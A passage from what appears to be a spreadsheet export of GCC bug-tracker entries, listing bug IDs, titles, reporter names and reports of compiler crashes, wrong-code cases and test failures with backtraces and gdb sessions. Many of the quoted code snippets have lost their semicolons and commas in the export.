0x6a3f70 c_parser_expr_no_commas
	../../gcc-source-trunk/gcc/c/c-parser.c:6268
0x6a4672 c_parser_expression
	../../gcc-source-trunk/gcc/c/c-parser.c:8463
0x6a50d9 c_parser_expression_conv
	../../gcc-source-trunk/gcc/c/c-parser.c:8496
0x6bb408 c_parser_statement_after_labels
	../../gcc-source-trunk/gcc/c/c-parser.c:5287
0x6bd2ab c_parser_compound_statement_nostart
	../../gcc-source-trunk/gcc/c/c-parser.c:4861
0x6bdb3e c_parser_compound_statement
	../../gcc-source-trunk/gcc/c/c-parser.c:4696
0x6bed67 c_parser_declaration_or_fndef
	../../gcc-source-trunk/gcc/c/c-parser.c:2105
0x6c7f95 c_parser_external_declaration
	../../gcc-source-trunk/gcc/c/c-parser.c:1549
0x6c8829 c_parser_translation_unit
	../../gcc-source-trunk/gcc/c/c-parser.c:1430
0x6c8829 c_parse_file()
	../../gcc-source-trunk/gcc/c/c-parser.c:17930
0x72b1b2 c_common_parse_file()
	../../gcc-source-trunk/gcc/c-family/c-opts.c:1070
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.
$: 
$: cat small.c
void f1() { extern int t }
void f2() {
  int g
  t(g)
}
$:</t>
  </si>
  <si>
    <t>GCC-24227</t>
  </si>
  <si>
    <t>[4.1 Regression] ICE in compare_values at tree-vrp.c:415</t>
  </si>
  <si>
    <t>/usr/lib/gcc/i586-suse-linux/4.1.0/cc1 -fpreprocessed window.i -quiet -dumpbase window.c -march=i586 -mtune=i686 -auxbase window -O2 -Wall -Wno-pointer-sign -version -fmessage-length=0 -fno-strict-aliasing -o window.s
window.c: In function â€˜Fdisplay_bufferâ€™:
window.c:2921: internal compiler error: in compare_values at tree-vrp.c:415
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
#0  fancy_abort (file=0x87533f0 ../../../src/gcc/gcc/tree-vrp.c line=415
    function=0x8753492 compare_values) at diagnostic.c:590
#1  0x085376cb in compare_values (val1=0x406248f0 val2=0x4062498c)
    at tree-vrp.c:414
#2  0x0853b03b in compare_ranges (comp=EQ_EXPR vr0=0xbfae1b00 vr1=0xbfae1af0)
    at tree-vrp.c:1790
#3  0x08540424 in compare_names (comp=EQ_EXPR n1=0x406248f0 n2=0x4062498c)
    at tree-vrp.c:3143
#4  0x085408c4 in vrp_evaluate_conditional (cond=0x4052f4a4 
    use_equiv_p=1 '\001') at tree-vrp.c:3222
#5  0x0819dd68 in fold_predicate_in (stmt=0x4051ae88)
    at tree-ssa-propagate.c:1037
#6  0x0819e05e in substitute_and_fold (prop_value=0x897a9b0
    use_ranges_p=1 '\001') at tree-ssa-propagate.c:1121
#7  0x0854374f in vrp_finalize () at tree-vrp.c:3958
#8  0x08543873 in execute_vrp () at tree-vrp.c:4028
#9  0x0852f0cd in execute_one_pass (pass=0x8777180) at passes.c:827
414       gcc_assert (POINTER_TYPE_P (TREE_TYPE (val1))
(gdb) call debug_tree(val1)
 &lt;ssa_name 0x406248f0
    type &lt;integer_type 0x4019d2e0 unsigned int sizes-gimplified public unsigned SI
        size 
        unit size 
        align 32 symtab 0 alias set -1 precision 32 min  max 
        pointer_to_this &gt;
    visited var  def_stmt 
    version 328&gt;
(gdb) up 3
#4  0x085408c4 in vrp_evaluate_conditional (cond=0x4052f4a4
    use_equiv_p=1 '\001') at tree-vrp.c:3222
3222                return compare_names (TREE_CODE (cond) op0 op1)
(gdb) call debug_tree(cond)
 &lt;eq_expr 0x4052f4a4
    type &lt;boolean_type 0x4019d4ac _Bool public unsigned QI
        size 
        unit size 
        align 8 symtab 0 alias set -1 precision 1 min  max &gt;
    arg 0 &lt;ssa_name 0x406248f0
        type &lt;integer_type 0x4019d2e0 unsigned int sizes-gimplified public unsigned SI
            size 
            unit size 
            align 32 symtab 0 alias set -1 precision 32 min  max 
            pointer_to_this &gt;
        visited var  def_stmt 
        version 328&gt;
    arg 1 &lt;ssa_name 0x4062498c
        type 
            sizes-gimplified public unsigned SI size  unit size 
            align 32 symtab 0 alias set -1&gt;
        visited var  def_stmt 
        version 331
        ptr-info 0x40780240&gt;&gt;
Looks like we start with mismatched types in the EQ_EXPR.</t>
  </si>
  <si>
    <t>GCC-33686</t>
  </si>
  <si>
    <t>FORALL loop gives wrong result</t>
  </si>
  <si>
    <t>A simple program that is supposed to invert a permutation P gives wrong result with gfortran 4.2.1. A quite recent trunk 4.3 gfortran also gave wrong result. See also discussion in comp.lang.fortran subject Most elegant syntax for inverting a permutation?. The concensus seems to be that this forall construct should work according to the standard.
PROGRAM TST
  IMPLICIT NONE
  INTEGER :: P(4)I
  P = (/2413/)
  FORALL(I=1:4)
    P(P(I)) = I
  END FORALL
  PRINT * P
END PROGRAM TST
enok@home:~/&gt; gfortran421 -o tst tst.f90 -static &amp;&amp; ./tst
           3           1           4           3
enok@home:~/&gt; ifort -o tst tst.f90 &amp;&amp; ./tst
tst.f90(5): (col. 3) remark: LOOP WAS VECTORIZED.
           3           1           4           2
enok@home:~/&gt;</t>
  </si>
  <si>
    <t>enok</t>
  </si>
  <si>
    <t>GCC-2593</t>
  </si>
  <si>
    <t>#include  fails.</t>
  </si>
  <si>
    <t xml:space="preserve">	#include  fails with these error messages:
	In file included from t.cc:28:
	/usr/include/g++-v3/hash_map.h:31:32: bits/stl_hashtable.h: No such file or directory
	In file included from t.cc:28:
	/usr/include/g++-v3/hash_map.h:35:31: bits/stl_hash_map.h: No such file or directory
	In file included from t.cc:28:
	/usr/include/g++-v3/hash_map.h:38: `hash' not declared
	/usr/include/g++-v3/hash_map.h:39: `hashtable' not declared
	/usr/include/g++-v3/hash_map.h:40: `hash_map' not declared
	/usr/include/g++-v3/hash_map.h:41: `hash_multimap' not declared
Release:
3.0 20010416 (prerelease)
Environment:
System: Linux hellhound 2.4.3-ac5 #16 Fri Apr 13 17:04:13 CEST 2001 i686 unknown
Architecture: i686
host: i686-pc-linux-gnu
build: i686-pc-linux-gnu
target: i686-pc-linux-gnu
configured with: ../gcc-20010320/configure --program-transform-name=s/^/e/ --prefix=/usr --enable-threads --enable-haifa --with-local-prefix=/usr/local
How-To-Repeat:
	$ echo #include  &gt; t.cc
	$ g++ -c t.cc</t>
  </si>
  <si>
    <t>GCC-24367</t>
  </si>
  <si>
    <t>[4.0/4.1/4.2 Regression] unrecognizable insn with -fPIC -O2 -funroll-loops</t>
  </si>
  <si>
    <t>g++ -g -Wall -fPIC -O2 -funroll-loops -o /dev/null -c disk.cpp
disk.cpp: In function 'char* test(const char* const char*)':
disk.cpp:13: error: unrecognizable insn:
(insn 542 541 544 26 (set (reg/f:SI 84)
        (plus:SI (reg:SI 12 %r12)
            (const:SI (plus:SI (unspec:SI [
                            (symbol_ref:SI (_ZZ4testPKcS0_E8rtn_path) [flags 0x2] )
                        ] 112)
                    (const_int 1024 [0x400]))))) -1 (nil)
    (nil))
disk.cpp:13: internal compiler error: in extract_insn at recog.c:2084
Code:
char *test(const char *parent const char *child)
{
        static char rtn_path[1024]
        char *s = rtn_path
        char *s_end = rtn_path + sizeof(rtn_path)
        const char *s2 = child
        while( *s != '\0' )
                s++
        while( (s &lt; s_end) &amp;&amp; (*s2 != '\0') )
                *s++ = *s2++
        return(rtn_path)
}</t>
  </si>
  <si>
    <t>waldi</t>
  </si>
  <si>
    <t>GCC-38283</t>
  </si>
  <si>
    <t>FAIL: libgomp.fortran/pr25162.f</t>
  </si>
  <si>
    <t>Executing on host: /test/gnu/gcc/objdir/gcc/xgcc -B/test/gnu/gcc/objdir/gcc/ /te
st/gnu/gcc/gcc/libgomp/testsuite/libgomp.fortran/pr25162.f  -B/test/gnu/gcc/objd
ir/hppa2.0w-hp-hpux11.11/./libgomp/ -I/test/gnu/gcc/objdir/hppa2.0w-hp-hpux11.11
/./libgomp -I/test/gnu/gcc/gcc/libgomp/testsuite/.. -fmessage-length=0 -fopenmp 
 -O0     -L/test/gnu/gcc/objdir/hppa2.0w-hp-hpux11.11/./libgomp/.libs -lgomp -L/
test/gnu/gcc/objdir/hppa2.0w-hp-hpux11.11/./libgomp/../libgfortran/.libs -lgfort
ranbegin -lgfortran -lm   -o ./pr25162.exe    (timeout = 300)
PASS: libgomp.fortran/pr25162.f  -O0  (test for excess errors)
Setting LD_LIBRARY_PATH to .:/test/gnu/gcc/objdir/hppa2.0w-hp-hpux11.11/./libgom
p/.libs:/test/gnu/gcc/objdir/gcc:/test/gnu/gcc/objdir/hppa2.0w-hp-hpux11.11/./li
bgomp/../libgfortran/.libs:.:/test/gnu/gcc/objdir/hppa2.0w-hp-hpux11.11/./libgom
p/.libs:/test/gnu/gcc/objdir/gcc:/test/gnu/gcc/objdir/hppa2.0w-hp-hpux11.11/./li
bgomp/../libgfortran/.libs
FAIL: libgomp.fortran/pr25162.f  -O0  execution test
Fails at all optimizations.
(gdb) r
Starting program: /test/gnu/gcc/objdir/hppa2.0w-hp-hpux11.11/libgomp/testsuite/pr25162.xg 
warning: Private mapping of shared library text was not specified
by the executable setting a breakpoint in a shared library which
is not privately mapped will not work.  See the HP-UX 11i v3 chatr
manpage for methods to privately map shared library text.
[New process 21031 lwp 174348]
[process 21031 lwp 174348 exited]
[New process 21031 lwp 174349]
[process 21031 lwp 174349 exited]
[New process 21031 lwp 174350]
[process 21031 lwp 174350 exited]
[New process 21031 lwp 174351]
[process 21031 lwp 174351 exited]
Program received signal SIGBUS Bus error.
0x00002eec in test1_ ()
    at /test/gnu/gcc/gcc/libgomp/testsuite/libgomp.fortran/pr25162.f:14
14	         BPRIM( I ) = DBLE( I )
Current language:  auto currently fortran
(gdb) bt
#0  0x00002eec in test1_ ()
    at /test/gnu/gcc/gcc/libgomp/testsuite/libgomp.fortran/pr25162.f:14
#1  0x00002e48 in MAIN__ ()
    at /test/gnu/gcc/gcc/libgomp/testsuite/libgomp.fortran/pr25162.f:5
#2  0x00003278 in main (argc=1 argv=0x0)
    at ../../../gcc/libgfortran/fmain.c:21
(gdb) disass 0x00002edc 0x00002efc
Dump of assembler code from 0x2edc to 0x2efc:
0x00002edc :	nop
0x00002ee0 :	copy ret0r19
0x00002ee4 :	depwz r42829ret0
0x00002ee8 :	addl ret0r19ret0
0x00002eec :	fstd fr120(ret0)
0x00002ef0 :	ldw 8(r3)r19
0x00002ef4 :	ldi 64ret0
0x00002ef8 :	cmpclr ret0r19ret0
End of assembler dump.
(gdb) p/x $ret0
$1 = 0x4000f494
The address is aligned to a 4-byte boundary for an 8-byte store.  This
address is returned by the call to __emutls_get_address.</t>
  </si>
  <si>
    <t>GCC-43703</t>
  </si>
  <si>
    <t>Unexpected floating point precision loss due to ARM NEON autovectorization</t>
  </si>
  <si>
    <t>Using gcc-4.5.0-RC-20100406.tar.bz2
/************************************************************/
#include 
void __attribute__((noinline)) f(float * __restrict c
                                 float * __restrict a
                                 float * __restrict b)
{
    int i
    for (i = 0 i &lt; 4 i++) {
        c[i] = a[i] * b[i]
    }
}
int main()
{
    float a[4] b[4] c[4]
    a[0] = 1e-40
    b[0] = 1e+38
    f(c a b)
    printf(c[0]=%f\n (double)c[0])
    if (c[0] &lt; 0.001)
        printf(precision problem: c[0] was flushed to zero\n)
    return 0
}
/************************************************************/
# gcc -mcpu=cortex-a8 -mfloat-abi=softfp -mfpu=neon -O2 -fno-fast-math test.c
# ./a.out
c[0]=0.010000
# gcc -mcpu=cortex-a8 -mfloat-abi=softfp -mfpu=neon -O3 -fno-fast-math test.c
# ./a.out
c[0]=0.000000
precision problem: c[0] was flushed to zero
Using -O3 option turns on autovectorization and the results of operations involving denormals get flushed to zero. This happens even if no -ffast-math or any other precision sacrificing options are enabled.</t>
  </si>
  <si>
    <t>GCC-12189</t>
  </si>
  <si>
    <t>abi_check fails to build</t>
  </si>
  <si>
    <t>Abi_check used to be disabled when build != host or with-cross-host.  It was
re-enabled but it doesn't seem to work for --with-cross-host at that point
CXX has to be a _C_ compiler and nothing links in libstdc++.  If CXX is a C++
compiler it will try to link to the system libstdc++ instead of the just-built
one anyway.
How is this supposed to work?
Regression from 3.3 to 3.3.1.</t>
  </si>
  <si>
    <t>GCC-4868</t>
  </si>
  <si>
    <t>[parser] ICE when omitting template parameter of a sub-class</t>
  </si>
  <si>
    <t xml:space="preserve">The compiler crashes on the following 3 lines of code:
struct A { template  struct B }
struct A::B {}  // illegal A::B is a template
A::B b
The error message is:
bug.cpp: In instantiation of `A::B':
bug.cpp:3:   instantiated from here
bug.cpp:2: Internal error: Segmentation fault
Please submit a full bug report etc.
Release:
2.95.3 3.0.2 3.1 (as of 20011023)
Environment:
i686-pc-linux-gnu mips-sgi-irix6.5
How-To-Repeat:
g++ -c </t>
  </si>
  <si>
    <t>GCC-433</t>
  </si>
  <si>
    <t>initializing</t>
  </si>
  <si>
    <t>When initializing a templated base class inside a ctor-initializer leaving out the template parameters causes an ice:
here is the exact error message:
{~/cc_exer}/usr/local/gcc-cvs/bin/g++ -v -g -Wall no_base_class_constructor_with_ns_qualifier.cc
Reading specs from /usr/local/gcc-cvs/bin/../lib/gcc-lib/i686-pc-linux/2.96/specs
gcc version 2.96 20000626 (experimental)
 /usr/local/gcc-cvs/bin/../lib/gcc-lib/i686-pc-linux/2.96/cpp -lang-c++ -v -iprefix /usr/local/gcc-cvs/bin/../lib/gcc-lib/i686-pc-linux/2.96/ -D__GNUC__=2 -D__GNUG__=2 -D__GNUC_MINOR__=96 -D__GNUC_PATCHLEVEL__=0 -D__cplusplus -D__ELF__ -Dunix -Dlinux -D__ELF__ -D__unix__ -D__linux__ -D__unix -D__linux -Asystem(posix) -D__EXCEPTIONS -g -Wall -Acpu(i386) -Amachine(i386) -Di386 -D__i386 -D__i386__ -D__tune_pentiumpro__ no_base_class_constructor_with_ns_qualifier.cc /tmp/ccooAGPX.ii
GNU CPP version 2.96 20000626 (experimental) (cpplib)
 (i386 Linux/ELF)
ignoring duplicate directory `/usr/local/gcc-cvs/include/g++-v3'
ignoring duplicate directory `/usr/local/gcc-cvs/lib/gcc-lib/i686-pc-linux/2.96/include'
ignoring duplicate directory `/usr/local/gcc-cvs/i686-pc-linux/include'
#include ... search starts here:
#include  search starts here:
 /usr/local/gcc-cvs/include/g++-v3
 /usr/local/gcc-cvs/lib/gcc-lib/i686-pc-linux/2.96/include
 /usr/local/gcc-cvs/i686-pc-linux/include
 /usr/local/include
 /usr/include
End of search list.
 /usr/local/gcc-cvs/bin/../lib/gcc-lib/i686-pc-linux/2.96/cc1plus /tmp/ccooAGPX.ii -quiet -dumpbase no_base_class_constructor_with_ns_qualifier.cc -g -Wall -version -o /tmp/ccSIZYfL.s
GNU C++ version 2.96 20000626 (experimental) (i686-pc-linux) compiled by GNU C version 2.96 20000626 (experimental).
no_base_class_constructor_with_ns_qualifier.cc: In method `Bar::Bar (T)':
no_base_class_constructor_with_ns_qualifier.cc:14: Tree check: expected class 't' have 'd'
(template_decl)
no_base_class_constructor_with_ns_qualifier.cc:14: Internal compiler error in `yyparse' at
cp/parse.y:933
Please submit a full bug report.
See  for instructions.
{~/cc_exer}cat no_base_class_constructor_with_ns_qualifier.cc
namespace Qux
{
  template 
  struct Foo
  {
    Foo(T){}
  }
}
template 
struct Bar:public Qux::Foo 
{
  Bar(T i):Qux::Foo(i){}
}
Release:
2.95.2 CVS 20010506
Environment:
i686-pc-linux-gnu glibc2.1.2 binutils 2.9.10
How-To-Repeat:
namespace Qux
{
  template 
  struct Foo
  {
    Foo(T){}
  }
}
template 
struct Bar:public Qux::Foo 
{
  Bar(T i):Qux::Foo(i){}
}</t>
  </si>
  <si>
    <t>llewelly</t>
  </si>
  <si>
    <t>GCC-51649</t>
  </si>
  <si>
    <t>pretty printers don't handle std::__7:: namespace</t>
  </si>
  <si>
    <t>the libstdc++ pretty printers don't work for gcc configured
with --enable-symvers=gnu-versioned-namespace.
e.g. it prints std::string as:
(gdb) p s
$1 = {
  static npos = 18446744073709551615
  _M_dataplus = {
    &gt; = {
       &gt;&gt; = {
        &gt; = {} } }
    members of std::__7::basic_string std::__7::allocator &gt;::_Alloc_hider:
    _M_p = 0x4d7220 foo bar
  }
}</t>
  </si>
  <si>
    <t>GCC-62132</t>
  </si>
  <si>
    <t>[5 Regression] FAIL: c-c++-common/asan/misalign-[12].c after r213807 on x86_64-apple-darwin13 with -m32</t>
  </si>
  <si>
    <t>On x86_64-apple-darwin13 with -m32 the following tests fail after r213807:
Running target unix/-m32
FAIL: c-c++-common/asan/misalign-1.c   -O0  output pattern test is =================================================================
FAIL: c-c++-common/asan/misalign-1.c   -O1  output pattern test is =================================================================
FAIL: c-c++-common/asan/misalign-1.c   -O2  output pattern test is =================================================================
FAIL: c-c++-common/asan/misalign-1.c   -O3 -fomit-frame-pointer  output pattern test is =================================================================
FAIL: c-c++-common/asan/misalign-1.c   -O3 -g  output pattern test is =================================================================
FAIL: c-c++-common/asan/misalign-1.c   -Os  output pattern test is =================================================================
FAIL: c-c++-common/asan/misalign-1.c   -O2 -flto -flto-partition=none  output pattern test is =================================================================
FAIL: c-c++-common/asan/misalign-1.c   -O2 -flto  output pattern test is =================================================================
FAIL: c-c++-common/asan/misalign-2.c   -O0  output pattern test is =================================================================
FAIL: c-c++-common/asan/misalign-2.c   -O1  output pattern test is =================================================================
FAIL: c-c++-common/asan/misalign-2.c   -O2  output pattern test is =================================================================
FAIL: c-c++-common/asan/misalign-2.c   -O3 -fomit-frame-pointer  output pattern test is =================================================================
FAIL: c-c++-common/asan/misalign-2.c   -O3 -g  output pattern test is =================================================================
FAIL: c-c++-common/asan/misalign-2.c   -Os  output pattern test is =================================================================
FAIL: c-c++-common/asan/misalign-2.c   -O2 -flto -flto-partition=none  output pattern test is =================================================================
FAIL: c-c++-common/asan/misalign-2.c   -O2 -flto  output pattern test is =================================================================
In 64 bit mode the output is
=================================================================
==48043==ERROR: AddressSanitizer: unknown-crash on address 0x7fff5ba3f3bf at pc 0x1041c0bf2 bp 0x7fff5ba3f2f0 sp 0x7fff5ba3f2e8
READ of size 4 at 0x7fff5ba3f3bf thread T0
    #0 0x1041c0bf1 (/Users/dominiq/Documents/Fortran/g95bench/win/f90/bug/a.out+0x100000bf1)
    #1 0x1041c0e8f (/Users/dominiq/Documents/Fortran/g95bench/win/f90/bug/a.out+0x100000e8f)
Address 0x7fff5ba3f3bf is located in stack of thread T0 at offset 175 in frame
    #0 0x1041c0caf (/Users/dominiq/Documents/Fortran/g95bench/win/f90/bug/a.out+0x100000caf)
...
while in 32 bit mode it is
=================================================================
==48035==ERROR: AddressSanitizer: unknown-crash on address 0xbffda4cf at pc 0x26b19 bp 0xbffda3d8 sp 0xbffda3cc
READ of size 4 at 0xbffda4cf thread T0
    #0 0x26b18 (/Users/dominiq/Documents/Fortran/g95bench/win/f90/bug/a.out+0x1b18)
Address 0xbffda4cf is located in stack of thread T0 at offset 175 in frame
    #0 0x26bef (/Users/dominiq/Documents/Fortran/g95bench/win/f90/bug/a.out+0x1bef)
...
i.e. the #1 line is missing. Revision r213806 is OK.</t>
  </si>
  <si>
    <t>GCC-22022</t>
  </si>
  <si>
    <t>[4.1 Regression] ACATS ICE cxg1002 tree_split_edge at tree-cfg.c:3025</t>
  </si>
  <si>
    <t>Andrew Pinski says it might be somewhat related to  PR21994
+===========================GNAT BUG DETECTED==============================+
| 4.1.0 20050610 (experimental) (x86_64-unknown-linux-gnu) GCC error:      |
| in tree_split_edge at tree-cfg.c:3025                                   | 
| Error detected at cxg1002.adb:198:5                                      |
 0  internal_error (gmsgid=0xa9ac83 in %s at %s:%d) at
/home/guerby/work/gcc/version-head/gcc/diagnostic.c:528
 #1  0x000000000071c81c in fancy_abort (file=Variable file is not
available.
 ) at /home/guerby/work/gcc/version-head/gcc/diagnostic.c:588
 #2  0x0000000000998e41 in tree_split_edge (edge_in=0x2a95eb2580) at
/home/guerby/work/gcc/version-head/gcc/tree-cfg.c:3025
 #3  0x0000000000933faa in split_edge (e=Variable e is not available.
 ) at /home/guerby/work/gcc/version-head/gcc/cfghooks.c:407
 #4  0x000000000099d34f in tree_find_edge_insert_loc (e=0x2a95eb2580
bsi=0x7fbffff4b0 new_bb=0x0)
     at /home/guerby/work/gcc/version-head/gcc/tree-cfg.c:2909
 #5  0x000000000099d726 in bsi_commit_one_edge_insert (e=Variable e is
not available.
 ) at /home/guerby/work/gcc/version-head/gcc/tree-cfg.c:2950
 #6  0x00000000009a3b72 in bsi_commit_edge_inserts () at
/home/guerby/work/gcc/version-head/gcc/tree-cfg.c:2931
 #7  0x00000000006a9a05 in tree_lower_complex () at
/home/guerby/work/gcc/version-head/gcc/tree-complex.c:1320</t>
  </si>
  <si>
    <t>GCC-78577</t>
  </si>
  <si>
    <t>Fix define_insn operand types for vexturhlx vexturhrx vextuwlx and vextuwrx patterns</t>
  </si>
  <si>
    <t>In each of these define_insn patterns operand 2 is currently described as having type V16QI.  Though the existing patterns correctly generate the intended code through the use of implicit type coercions the patterns as currently written are confusing and unclear.  The half-word patterns should constrain operand 2 to be of type V8HI and the full-word patterns should constrain operand 2 to be of type V4SI.</t>
  </si>
  <si>
    <t>GCC-17756</t>
  </si>
  <si>
    <t>[4.0 Regression] contained_3.f90</t>
  </si>
  <si>
    <t>-O2/-O3
powerpc-ibm-aix5.2.0.0 error message:
unhandled expression in get_expr_operands():
 &lt;const_decl 3004b080
    type &lt;integer_type 30009680 int4 public SI
        size 
        unit size 
        align 32 symtab 0 alias set 3 precision 32 min &lt;integer_cst 300074c0 -21
47483648&gt; max 
        pointer_to_this  reference_to_this &lt;reference_typ
e 30049280&gt;&gt;
    addressable VOID file /farm/dje/src/src/gcc/testsuite/gfortran.fortran-tortu
re/execute/contained_3.f90 line 8
    align 1 context  initial &lt;integer_cst 30047640 
3&gt;&gt;</t>
  </si>
  <si>
    <t>GCC-37959</t>
  </si>
  <si>
    <t>g++ does not emit DW_AT_explicit</t>
  </si>
  <si>
    <t>g++ -g does not emit DW_AT_explicit for explicit constructors.
It should I think it is impossible to correctly parse
some expressions without this information.</t>
  </si>
  <si>
    <t>GCC-45923</t>
  </si>
  <si>
    <t>constexpr diagnostics more more</t>
  </si>
  <si>
    <t>This is pretty minor but thought I'd point it out.
struct complex 
{
#if 0
  constexpr complex(double r double i) : re(r) im(i) { } 
#else
  complex(double r double i) : re(r) im(i) { } 
#endif
  constexpr double real() { return re }
  double imag() const { return im }
private:
  double re 
  double im
}
constexpr complex co1(0 1) // literal object
//constant expression data initialized  by a user-defined literal
constexpr double dd2 = co1.real() // OK
with:
%$bin/H-x86_64-gcc-constexpr.20101004/bin/g++ --version
g++ (GCC) 4.6.0 20101004 (experimental)
like so:
%$bin/H-x86_64-gcc-constexpr.20101004/bin/g++ -std=c++0x -c constexpr-basic.cc
gives:
constexpr-basic.cc:9:20: error: enclosing class of â€˜constexpr double complex::real() constâ€™ is not a literal type
YES! Except the member function signature for real() has a superfulous const
constexpr-basic.cc:17:27: error: the type â€˜const complexâ€™ of constexpr variable â€˜co1â€™ is not literal
YES! Except this is more like invalid definition of constexpr variable 'co1' of non-literal type 'complex'
constexpr-basic.cc:20:33: error: â€˜double complex::real() constâ€™ is not a constexpr function
NO!
Perhaps the last one should read: 
constexpr-basic.cc:20:33: error: member function â€˜constexpr double complex::real()â€™ cannot be used in a constant expression with a non-literal object
Or something.</t>
  </si>
  <si>
    <t>GCC-5397</t>
  </si>
  <si>
    <t>ICE on compiling source with 540 000 000 REAL array</t>
  </si>
  <si>
    <t xml:space="preserve">This program
      DIMENSION A(540 000 000)
      END
draws:
yu2.f: In program `MAIN__':
yu2.f:1: size of variable `a' is too large
f771: ../../combined/gcc/f/com.c:7550: ffecom_sym_transform_: Assertion `0 == compare_tree_int ((__extension__ ({ const tree __t = (t) if (tree_code_type[(int) (((enum tree_code) (__t)-&gt;common.code))] != ('d')) tree_class_check_failed (__t 'd' ../../combined/gcc/f/com.c 7550 __FUNCTION__) __t })-&gt;decl.size_unit) ((st)-&gt;size))' failed.
yu2.f:1: confused by earlier errors bailing out
Release:
Upcoming gcc/g77-3.1
Environment:
All
How-To-Repeat:
g77 </t>
  </si>
  <si>
    <t>GCC-1639</t>
  </si>
  <si>
    <t>template operator != interferes with const expressions</t>
  </si>
  <si>
    <t>The testcase
template bool operator!=( T t1 T t2 ) { return !t1==t2 }
enum { e1 e2 }
struct S {
	static const bool b= e1 != e2
}
gives an error:
bug2.cxx:7: field initializer is not constant
This happens only when != arguments are enums and
only when initializer is inside class declaration.
Release:
20010108 snapshot
Environment:
RedHat Linux 6.2 i386</t>
  </si>
  <si>
    <t>kaa</t>
  </si>
  <si>
    <t>GCC-3936</t>
  </si>
  <si>
    <t>g++</t>
  </si>
  <si>
    <t>[ Reported to the Debian BTS as report #88694.
  Please CC 88694-quiet@bugs.debian.org on replies.
  Log of report can be found at http://bugs.debian.org/88694 ]
The compiler optimizes out the variable which is OK without -g but
with -g the stabs debugging info explicitly references the
optimized-out variable causing an undefined reference and the
application (e.g. flightgear) will fail to link (seen on sparc-linux
not i386-linux).
typedef double SCALAR
typedef SCALAR VECTOR_3[3]
class LaRCsimIC {
public:
  SCALAR xlo xhixminxmax
  typedef SCALAR (LaRCsimIC::*fp)(SCALAR x)
  fp sfunc
  bool solve( SCALAR *ySCALAR x)
}
bool LaRCsimIC::solve( SCALAR *ySCALAR x) {
  float x1x2x3f1f2f3dd0
  float eps=1E-5
  float const relax =0.9
  int i
  bool success=false
  d=1
    x1=xlox3=xhi
    f1=(this-&gt;*sfunc)(x1)-x
    f3=(this-&gt;*sfunc)(x3)-x
    d0=fabs(x3-x1)
    //iterations
    i=0
    while ((fabs(d) &gt; eps) &amp;&amp; (i &lt; 100)) {
      d=(x3-x1)/d0
      x2=x1-d*d0*f1/(f3-f1)
      f2=(this-&gt;*sfunc)(x2)-x
      if(fabs(f2) &lt;= 0.001) {
        x1=x3=x2
      } else if(f1*f2 &lt;= 0.0) {
        x3=x2
        f3=f2
        f1=relax*f1
      } else if(f2*f3 &lt;= 0) {
        x1=x2
        f1=f2   
        f3=relax*f3
      }
      i++
    }//end while
    if(i &lt; 100) {
      success=true
      *y=x2  
    }
  return success
}
$ g++-3.0 -O2 -g -c bug.cc  nm bug.o 
0000000000000000 a *ABS*
                 U .LLC0
00000000000002c8 t Letext
0000000000000000 T _ZN9LaRCsimIC5solveEPdd
0000000000000000 ? __FRAME_BEGIN__
                 U __gxx_personality_v0
                 U fabs
$ g++-3.0 -O2 -c bug.cc  nm bug.o
0000000000000000 a *ABS*
0000000000000000 T _ZN9LaRCsimIC5solveEPdd
0000000000000000 ? __FRAME_BEGIN__
                 U __gxx_personality_v0
                 U fabs
Release:
3.0.1 (CVS 20010801) (Debian GNU/Linux)
Environment:
System: Debian GNU/Linux (testing/unstable)
Architecture: sparc
host: sparc-linux
build: sparc-linux
target: sparc-linux
configured with: ../src/configure -v --enable-languages=cc++javaf77protoobjc --prefix=/usr --infodir=/share/info --mandir=/share/man --enable-shared --with-gnu-as --with-gnu-ld --with-system-zlib --enable-long-long --enable-nls --without-included-gettext --disable-checking --enable-threads=posix --enable-java-gc=boehm --with-cpp-install-dir=bin --enable-objc-gc sparc-linux</t>
  </si>
  <si>
    <t>88694-quiet</t>
  </si>
  <si>
    <t>GCC-2148</t>
  </si>
  <si>
    <t>Strange warning while bootstrapping the libstc++ library</t>
  </si>
  <si>
    <t>While bootstrapping the libstdc++ library I get the warning:
../../../../gcc/libstdc++-v3/include/bits/basic_string.h: In function 
   `std::basic_istream&amp; 
   std::operator&gt;&gt;(std::basic_istream&amp; 
   std::basic_string&amp;) [with _CharT = char _Traits = 
   std::char_traits _Alloc = std::allocator]':
../../../../gcc/libstdc++-v3/src/misc-inst.cc:189:   instantiated from here
../../../../gcc/libstdc++-v3/include/bits/basic_string.h:1133: warning: comparison
   between signed and unsigned integer expressions
This is really strange since basic_string.h has only 1039 lines
Release:
3.1 20010301 (experimental)
Environment:
System: Linux kiste 2.4.2 #34 Sun Feb 25 20:03:34 CET 2001 i686 unknown
Architecture: i686
Suse 7.1
glibc 2.2
host: i686-pc-linux-gnu
build: i686-pc-linux-gnu
target: i686-pc-linux-gnu
configured with: ../gcc/configure --enable-shared --disable-nls --enable-threads=posix --enable-long-long
How-To-Repeat:
Bootstrap the current libstdc++ library.</t>
  </si>
  <si>
    <t>GCC-29472</t>
  </si>
  <si>
    <t>[4.2 Regression] in reload at reload1.c:1081 on m68k with -O2 -fPIC</t>
  </si>
  <si>
    <t>I get the following ICE on m68k with -O2 -fPIC.  It fails with gcc 4.0 4.1 and 4.2 and works with 3.3/3.4.
(sid)115:tbm@usurper: ~] /home/tbm/tmp/gcc/4.1-m68k/gcc/g++ -B/home/tbm/tmp/gcc/4.1-m68k/gcc -O2 -fPIC blender-IK_QSegment.cpp
blender-IK_QSegment.cpp: In member function 'bool IK_QSwingSegment::UpdateAngle(const IK_QJacobian&amp; MT_Vector3&amp; bool*)':
blender-IK_QSegment.cpp:85: internal compiler error: in reload at reload1.c:1079
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
zsh: exit 1     /home/tbm/tmp/gcc/4.1-m68k/gcc/g++ -B/home/tbm/tmp/gcc/4.1-m68k/gcc -O2 -fPIC
(sid)116:tbm@usurper: ~] /home/tbm/tmp/gcc/4.2-m68k-117734/gcc/g++ -B/home/tbm/tmp/gcc/4.2-m68k-117734/gcc/g++ -O2 -fPIC blender-IK_QSegment.cpp
blender-IK_QSegment.cpp: In member function 'bool IK_QSwingSegment::UpdateAngle(const IK_QJacobian&amp; MT_Vector3&amp; bool*)':
blender-IK_QSegment.cpp:85: internal compiler error: in reload at reload1.c:1081
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
